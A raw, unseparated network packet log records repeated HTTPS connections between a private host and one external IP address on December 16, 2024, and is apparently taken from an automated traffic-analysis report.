        Dec 16, 2024 17:39:42.961839914 CET443497113.134.125.175192.168.11.20
        Dec 16, 2024 17:39:45.271378994 CET49712443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:45.271440029 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:45.271636009 CET49712443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:45.271733999 CET49712443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:45.271780014 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:45.592463970 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:45.593128920 CET49712443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:45.593137026 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:45.593890905 CET49712443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:45.593903065 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:46.059134007 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:46.063244104 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:46.063467026 CET49712443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:46.063497066 CET49712443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:46.063513041 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:46.063566923 CET49712443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:46.063577890 CET443497123.134.125.175192.168.11.20
        Dec 16, 2024 17:39:49.332943916 CET49713443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:49.332993984 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:49.333178997 CET49713443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:49.333444118 CET49713443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:49.333472013 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:49.656622887 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:49.657149076 CET49713443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:49.657180071 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:49.657613993 CET49713443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:49.657638073 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:50.084093094 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:50.087213039 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:50.087439060 CET49713443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:50.087500095 CET49713443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:50.087500095 CET49713443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:50.087536097 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:50.087549925 CET443497133.134.125.175192.168.11.20
        Dec 16, 2024 17:39:51.363770962 CET49714443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:51.363832951 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:51.364034891 CET49714443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:51.364130974 CET49714443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:51.364166021 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:51.690861940 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:51.691371918 CET49714443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:51.691406965 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:51.691829920 CET49714443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:51.691863060 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:52.126307964 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:52.129473925 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:52.129668951 CET49714443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:52.129713058 CET49714443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:52.129713058 CET49714443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:52.129739046 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:52.129749060 CET443497143.134.125.175192.168.11.20
        Dec 16, 2024 17:39:54.410100937 CET49715443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:54.410130978 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:54.410298109 CET49715443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:54.410546064 CET49715443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:54.410561085 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:54.731450081 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:54.732230902 CET49715443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:54.732242107 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:54.733119965 CET49715443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:54.733128071 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:55.175316095 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:55.177026987 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:55.177150011 CET49715443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:55.177206993 CET49715443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:55.177206993 CET49715443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:55.177223921 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:55.177229881 CET443497153.134.125.175192.168.11.20
        Dec 16, 2024 17:39:58.456218004 CET49716443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:58.456243992 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:39:58.456402063 CET49716443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:58.456533909 CET49716443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:58.456547022 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:39:58.779901028 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:39:58.780328989 CET49716443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:58.780342102 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:39:58.780766010 CET49716443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:58.780776024 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:39:59.232536077 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:39:59.232731104 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:39:59.232917070 CET49716443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:59.233020067 CET49716443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:59.233020067 CET49716443192.168.11.203.134.125.175
        Dec 16, 2024 17:39:59.233052015 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:39:59.233062983 CET443497163.134.125.175192.168.11.20
        Dec 16, 2024 17:40:00.486707926 CET49722443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:00.486732960 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:00.486917973 CET49722443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:00.487046003 CET49722443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:00.487059116 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:00.812309027 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:00.812757015 CET49722443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:00.812769890 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:00.815342903 CET49722443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:00.815352917 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:01.275214911 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:01.275353909 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:01.275521040 CET49722443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:01.275823116 CET49722443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:01.275823116 CET49722443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:01.275851965 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:01.275860071 CET443497223.134.125.175192.168.11.20
        Dec 16, 2024 17:40:04.548300028 CET49723443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:04.548321962 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:04.548525095 CET49723443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:04.548615932 CET49723443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:04.548624992 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:04.873089075 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:04.873539925 CET49723443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:04.873595953 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:04.873958111 CET49723443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:04.874015093 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:05.313059092 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:05.313397884 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:05.313596964 CET49723443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:05.313678980 CET49723443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:05.313679934 CET49723443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:05.313738108 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:05.313755989 CET443497233.134.125.175192.168.11.20
        Dec 16, 2024 17:40:06.563374043 CET49724443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:06.563498974 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:06.563707113 CET49724443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:06.563808918 CET49724443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:06.563843012 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:06.895435095 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:06.895862103 CET49724443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:06.895915985 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:06.896320105 CET49724443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:06.896384954 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:07.333345890 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:07.350050926 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:07.350301027 CET49724443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:07.350375891 CET49724443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:07.350375891 CET49724443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:07.350425005 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:07.350452900 CET443497243.134.125.175192.168.11.20
        Dec 16, 2024 17:40:08.594305038 CET49725443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:08.594399929 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:08.594613075 CET49725443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:08.594698906 CET49725443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:08.594733000 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:08.926094055 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:08.926503897 CET49725443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:08.926563978 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:08.926968098 CET49725443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:08.927021027 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:09.357101917 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:09.359721899 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:09.359971046 CET49725443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:09.360054016 CET49725443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:09.360054016 CET49725443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:09.360111952 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:09.360132933 CET443497253.134.125.175192.168.11.20
        Dec 16, 2024 17:40:11.640559912 CET49726443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:11.640593052 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:11.640909910 CET49726443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:11.640940905 CET49726443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:11.640950918 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:11.965897083 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:11.966283083 CET49726443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:11.966299057 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:11.966885090 CET49726443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:11.966896057 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:12.377500057 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:12.378184080 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:12.378336906 CET49726443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:12.378391027 CET49726443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:12.378391027 CET49726443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:12.378407001 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:12.378413916 CET443497263.134.125.175192.168.11.20
        Dec 16, 2024 17:40:15.702586889 CET49727443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:15.702675104 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:15.702877045 CET49727443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:15.702949047 CET49727443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:15.702975988 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:16.031759977 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:16.032329082 CET49727443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:16.032388926 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:16.032872915 CET49727443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:16.032916069 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:16.469451904 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:16.479530096 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:16.479729891 CET49727443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:16.479801893 CET49727443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:16.479801893 CET49727443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:16.479867935 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:16.479893923 CET443497273.134.125.175192.168.11.20
        Dec 16, 2024 17:40:17.732909918 CET49728443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:17.732944965 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:17.733167887 CET49728443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:17.733247995 CET49728443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:17.733263969 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:18.061110973 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:18.061557055 CET49728443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:18.061578989 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:18.062127113 CET49728443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:18.062143087 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:18.481329918 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:18.482036114 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:18.482193947 CET49728443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:18.482300043 CET49728443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:18.482300043 CET49728443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:18.482353926 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:18.482378960 CET443497283.134.125.175192.168.11.20
        Dec 16, 2024 17:40:20.779200077 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:20.779309988 CET443497293.134.125.175192.168.11.20
        Dec 16, 2024 17:40:20.779531002 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:20.779635906 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:20.779670954 CET443497293.134.125.175192.168.11.20
        Dec 16, 2024 17:40:21.105110884 CET443497293.134.125.175192.168.11.20
        Dec 16, 2024 17:40:21.105609894 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:21.105631113 CET443497293.134.125.175192.168.11.20
        Dec 16, 2024 17:40:21.105989933 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:21.106005907 CET443497293.134.125.175192.168.11.20
        Dec 16, 2024 17:40:21.532140017 CET443497293.134.125.175192.168.11.20
        Dec 16, 2024 17:40:21.534307957 CET443497293.134.125.175192.168.11.20
        Dec 16, 2024 17:40:21.534600973 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:21.534600973 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:21.534600973 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:21.840466022 CET49729443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:21.840539932 CET443497293.134.125.175192.168.11.20
        Dec 16, 2024 17:40:22.809997082 CET49730443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:22.810081959 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:22.810239077 CET49730443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:22.810429096 CET49730443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:22.810480118 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:23.137773991 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:23.138303995 CET49730443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:23.138360977 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:23.138694048 CET49730443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:23.138736963 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:23.581976891 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:23.582051039 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:23.582397938 CET49730443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:23.582736969 CET49730443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:23.582736969 CET49730443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:23.582751036 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:23.582756042 CET443497303.134.125.175192.168.11.20
        Dec 16, 2024 17:40:24.840670109 CET49731443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:24.840758085 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:24.840970993 CET49731443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:24.841042042 CET49731443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:24.841070890 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:25.176466942 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:25.176923990 CET49731443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:25.176979065 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:25.177478075 CET49731443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:25.177520990 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:25.599862099 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:25.599935055 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:25.600119114 CET49731443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:25.600477934 CET49731443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:25.600490093 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:25.600548983 CET49731443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:25.600560904 CET443497313.134.125.175192.168.11.20
        Dec 16, 2024 17:40:26.871449947 CET49732443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:26.871534109 CET443497323.134.125.175192.168.11.20
        Dec 16, 2024 17:40:26.871685028 CET49732443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:26.871804953 CET49732443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:26.871831894 CET443497323.134.125.175192.168.11.20
        Dec 16, 2024 17:40:27.205948114 CET443497323.134.125.175192.168.11.20
        Dec 16, 2024 17:40:27.206401110 CET49732443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:27.206459045 CET443497323.134.125.175192.168.11.20
        Dec 16, 2024 17:40:27.206887960 CET49732443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:27.206933022 CET443497323.134.125.175192.168.11.20
        Dec 16, 2024 17:40:27.654755116 CET443497323.134.125.175192.168.11.20
        Dec 16, 2024 17:40:27.660428047 CET443497323.134.125.175192.168.11.20
        Dec 16, 2024 17:40:27.660608053 CET49732443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:27.660608053 CET49732443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:27.660681963 CET49732443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:27.660732031 CET443497323.134.125.175192.168.11.20
        Dec 16, 2024 17:40:30.933069944 CET49733443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:30.933134079 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:30.933314085 CET49733443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:30.933439016 CET49733443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:30.933480024 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:31.261464119 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:31.262051105 CET49733443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:31.262105942 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:31.262353897 CET49733443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:31.262406111 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:31.682106972 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:31.683676004 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:31.683820009 CET49733443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:31.683923960 CET49733443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:31.683923960 CET49733443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:31.683953047 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:31.683960915 CET443497333.134.125.175192.168.11.20
        Dec 16, 2024 17:40:33.963934898 CET49734443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:33.964032888 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:33.964271069 CET49734443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:33.964428902 CET49734443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:33.964478970 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:34.291855097 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:34.292350054 CET49734443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:34.292412996 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:34.292891979 CET49734443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:34.292937040 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:34.723299026 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:34.724330902 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:34.724519014 CET49734443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:34.724570036 CET49734443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:34.724570036 CET49734443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:34.724585056 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:34.724590063 CET443497343.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.025356054 CET49735443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:38.025461912 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.025682926 CET49735443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:38.025799990 CET49735443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:38.025834084 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.354995966 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.355571985 CET49735443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:38.355628014 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.355999947 CET49735443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:38.356044054 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.779774904 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.780087948 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.780299902 CET49735443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:38.780361891 CET49735443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:38.780361891 CET49735443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:38.780412912 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:38.780441046 CET443497353.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.071583033 CET49736443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:41.071685076 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.072000027 CET49736443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:41.072097063 CET49736443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:41.072129965 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.400657892 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.401119947 CET49736443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:41.401174068 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.401607990 CET49736443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:41.401662111 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.847582102 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.847780943 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.848001003 CET49736443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:41.848146915 CET49736443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:41.848146915 CET49736443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:41.848189116 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:41.848201990 CET443497363.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.117753983 CET49737443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:44.117841959 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.117990971 CET49737443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:44.118084908 CET49737443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:44.118117094 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.450635910 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.451123953 CET49737443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:44.451179028 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.451582909 CET49737443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:44.451634884 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.861874104 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.862234116 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.862446070 CET49737443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:44.862524986 CET49737443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:44.862525940 CET49737443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:44.862581968 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:44.862606049 CET443497373.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.148523092 CET49738443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:46.148607016 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.148796082 CET49738443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:46.148880959 CET49738443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:46.148910046 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.476021051 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.476453066 CET49738443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:46.476507902 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.476972103 CET49738443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:46.477021933 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.906363010 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.906658888 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.906836033 CET49738443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:46.906918049 CET49738443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:46.906918049 CET49738443192.168.11.203.134.125.175
        Dec 16, 2024 17:40:46.906984091 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:46.907006979 CET443497383.134.125.175192.168.11.20
        Dec 16, 2024 17:40:48.179433107 CET49739443192.168.11.203.134.125.175
